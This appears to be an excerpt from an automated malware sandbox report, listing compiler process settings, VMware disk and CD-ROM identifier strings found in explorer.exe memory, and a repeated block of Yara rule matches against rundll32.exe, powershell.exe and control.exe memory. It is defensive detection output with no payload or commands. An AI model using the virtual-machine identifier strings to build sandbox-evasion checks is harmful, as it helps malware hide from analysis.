Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n |
Source: explorer.exe, 0000001A.00000000.423556966.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647& |
Source: explorer.exe, 0000001A.00000000.404550743.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00 |
Source: RuntimeBroker.exe, 00000020.00000000.597070582.000001C95EA58000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}so |
Source: explorer.exe, 0000001A.00000000.411765907.00000000062C4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001A.00000000.402898816.0000000004287000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0 |
Source: explorer.exe, 0000001A.00000000.434857653.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^ |
Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00l |
Source: explorer.exe, 0000001A.00000000.423589479.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.400779619.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.404531568.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^ |
Source: explorer.exe, 0000001A.00000000.404600031.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.417672396.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman |
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock |
Source: explorer.exe, 0000001A.00000000.425893659.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.400809333.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.404550743.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4 |
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |